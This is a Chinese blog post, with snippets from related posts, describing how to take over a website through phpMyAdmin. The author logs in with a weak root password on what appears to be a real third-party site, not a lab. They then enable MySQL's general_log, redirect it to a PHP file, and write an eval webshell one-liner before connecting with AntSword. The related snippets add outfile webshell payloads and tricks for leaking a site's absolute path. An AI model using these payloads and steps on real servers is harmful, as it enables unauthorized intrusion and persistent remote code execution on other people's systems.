phpmyadmin拿权限

最新推荐文章于 2023-07-12 11:47:19 发布
最新推荐文章于 2023-07-12 11:47:19 发布
阅读量771 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kzyyx/article/details/108329427
版权

phpmyadmin拿权限

挺垃圾的一个网站通过弱口令root进入后台。
最主要还能直接访问网站根目录下phpinfo查看网站绝对路径。
1.首先尝试执行outfile语句写入一句话木马
在这里插入图片描述
报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。
这是secure_file_priv参数的说明。
在这里插入图片描述2.执行show variables like “%secure%”; 查看配置
在这里插入图片描述
回显设置为NULL,没有做限制,但是不能写入一句话。暂时不知道原因,后续懂了做补充。
3.查看general_log是否开启
通过show global variables like “%genera%”;查看
执行set global general_log=‘on’;打开
在这里插入图片描述
4.通过generali_log_file写入一句话木马

set global general_log_file=“网站绝对路径/文件名”; select ‘<?php @eval($_POST[1])?>’;
在这里插入图片描述
5.使用蚁剑进行连接

general log说明;
eneral_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

kzyyx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHPmyadmin获取权限
qq_45566117的博客
12-07 415
一、PHPmyadmin账号和密码 二、phpmyadmin拿shell的两种方法 1、低版本:SELECT “<?php @assert($_REQUEST["admin"]);?>” INTO OUTFILE ‘/网站绝对路径/shell.php’ 2、高版本:show variables like ‘%secure%’ show variables like ‘%general%’ set global general_log=‘on’; SET global general_log_f
mysql root拿shell_通过phpmyadmin root权限拿shell
weixin_39716703的博客
02-07 145
先登录进phpmyadmin root权限进来-----------Step1-------->>>>>>点mysql 如图.Step 2 -------->>>>>> 点SQL这里Step 3 -------->>>>>> 在这里输入sql语句,和一句话木马命令如下:CREATE TA...
【渗透】phpMyAdmin 上传 webshell 拿后台权限
边扯边淡
02-13 1838
起序:渗透测试的时候遇到了,复现总结一下。 一、靶场环境 VMware Workstation 15.5 Pro windows server 2003 phpStudy 2018 二、两种方式 利用日志文件写入一句话木马 写入一句话木马生成文件(实际操作时会遇到困难) 1、利用日志文件写入一句话木马 日志文件写入 的思路利用 MySQL 的一个日志文件。我们执行的每一个 sql 语句都会被保存到日志中,换个思路想一下如果把这个日志文件重名为 *.php,然后我们再执行一次 sql语句,那么就会
MYSQL快速写入一句话拿权限技巧
KHOST的博客
01-31 764
必须条件: root权限 GPC关闭(能使用单引号) 有绝对路径(读文件可以不用,写文件必须) 没有配置–secure-file-priv id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’# <? phpinfo()...
phpMyAdmin LOAD DATA INFILE 任意文件读取漏洞
Ambulong的博客
12-15 1154
有许多文章指出一个恶意的 MySQL 服务器可以利用LOAD DATA LOCAL命令来读取MYSQL客户端的任意文件。根据这篇公开的文章 (phpMyAdmin开启远程登陆导致本地文件读取),我们知道 phpMyAdmin 在AllowArbitraryServer开启(允许连接到任意MySQL服务器)的情况下(如云主机/云数据库提供商),可以利用该缺陷来读取phpMyAdmin服务器上的文件...
phpMyadmin 用户权限中英对照
10-29
在登陆phpmyadmin时选择了“中文 – Chinese Simplified“,那么就有中文的管理界面了,虽然在phpmyadmin中显示的用户权限显示的还是英文的,但是鼠标放上去时,有中文的提示,这里把phpmyadmin v3.2.4中英文对照表...
phpmyadmin中为站点设置mysql权限的图文方法
09-11
`phpMyAdmin` 是一个广泛使用的基于Web的MySQL数据库管理系统,它提供了一个图形化的界面来管理数据库、用户和权限。本文将详细介绍如何在`phpMyAdmin`中为特定站点设置MySQL权限。 1. **登录phpMyAdmin**: 首先,...
利用phpmyadmin设置mysql的权限方法
09-09
PHPMyAdmin是一个流行的Web界面工具,用于管理和操作MySQL数据库,其中包括设置和管理用户权限的功能。下面将详细介绍如何利用PHPMyAdmin来设置MySQL的权限。 1. **登录**: 首先,你需要通过浏览器访问PHPMyAdmin...
如何用phpmyadmin设置mysql数据库用户的权限
10-28
发现有很多用户对数据库用户权限的设置不太了解,下面为大家详细讲解一下如何用 phpMyAdmin 来设置数据库用户的权限
phpMyAdmin要嵌入到已有的界面
bjx18356163055的博客
02-13 481
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
php爆网站 绝对路径小结 - cracer_CSDN
最新发布
m0_67888657的博客
07-12 312
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。解决方法其实也很简单,既然我们不能减慢目标网站的速度,那我们就想办法减慢自己的速度,这样达到的效果是一样的。也很简单,只要我们找一个速度极慢的代理,挂上以后再上目标网站,就有可能将绝对路径爆出来。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。将要提交的参数值改成错误值,比如-1。
phpmyadmin页面getshell
qq_52469895的博客
04-10 2376
来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、看secure_file_priv值 show global variables like '%secure%'; 关于secure_file_
phpmyadmin网站shell
J_joker_的博客
11-16 843
时间:2018-11-15 ID:joker_vip(CSDN)     这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。     这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量找存在PHP探针的网站,类似于下图...
获取网站路径绝对路径的方法汇总
mingyqf的博客
05-26 2455
获取网站路径绝对路径的方法汇总 一、单引号爆路径 就像测试SQL注入一样在参数后面加上单引号。 http:``//localhost/news``.php?``id``=100' 二、错误参数值爆路径 通过第一种方式可以会触发waf,因此可以通过错误的参数值来爆网站路径。 如: http:``//localhost/news``.php?``id``=-1``http:``//localhost/news``.php?``id``=oSxMa 三、通过搜索引擎获取 通过搜索引擎语...
获取网站绝对路径常用方法
weixin_41489908的博客
08-15 3426
始终相信那些尝遍人生百味的人,灵魂会更加生动且干净。。。 ---- 网易云热评 一、报错显示 搜索inurl:warning,看百度快照 二、搜索敏感文件 inurl:phpinfo.php 三、Windows下常用路径 c:/boot.ini //看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码c:/winnt/php.inic:/winnt/my.i.
phpmyadmin之getshell总结
Adminxe的博客
05-03 497
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用慢询日志getse...
PHP爆绝对路径方法收集贴
dibodang1423的博客
06-15 436
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149′ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxx.com/researcharchive.php?id=-1 3、Go...
phpmyadmin爆破绝对路径
偷一个月亮
04-16 3956
phpmyadmin爆绝对路径 phpMyAdmin/libraries/select_lang.lib.php phpMyAdmin/darkblue_orange/layout.inc.php phpMyAdmin/index.php?lang[]=1 phpMyAdmin/themes/darkblue_orange/layout.inc.php 转载链接:https://www.jian...
phpmyadmin权限
04-26
访问数据库怎么办? 如果phpMyAdmin无法访问数据库,很有可能是数据库的权限设置问题。您需要登录MySQL并授予需要访问数据库的用户相应的权限。具体步骤如下: 1. 使用root用户登录MySQL。 2. 通过以下命令为需要访问数据库的用户创建帐户: CREATE USER 'username'@'localhost' IDENTIFIED BY 'password'; 3. 授予用户访问数据库的权限: GRANT ALL PRIVILEGES ON database_name.* TO 'username'@'localhost'; 其中,database_name是您希望用户访问的数据库的名称。 4. 刷新MySQL权限: FLUSH PRIVILEGES; 完成后,phpMyAdmin将可以使用授予权限的帐户登录并访问数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值